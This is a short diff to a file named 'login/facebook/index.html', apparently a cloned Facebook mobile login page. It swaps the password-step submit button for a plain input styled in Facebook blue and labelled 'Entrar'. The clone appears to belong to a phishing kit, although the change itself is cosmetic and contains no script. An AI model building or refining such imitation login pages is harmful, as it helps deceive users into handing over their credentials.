--- a/login/facebook/index.html
+++ b/login/facebook/index.html
@@ -135,15 +135,11 @@
                       <div
                         id="login_password_step_element"
                         data-sigil="login_password_step_element">
-                        <button
+                        <input
+                          style="background-color: #1877f2"
                           type="submit"
                           value="Entrar"
-                          class="_54k8 _52jh _56bs _56b_ _28lf _9cow _56bw _56bu"
-                          name="login"
-                          data-sigil="touchable login_button_block m_login_button"
-                          data-autoid="autoid_9">
-                          <span class="_55sr">Entrar</span>
-                        </button>
+                          class="_54k8 _52jh _56bs _56b_ _28lf _9cow _56bw _56bu" />
                       </div>
                       <div
                         class="_7eif"
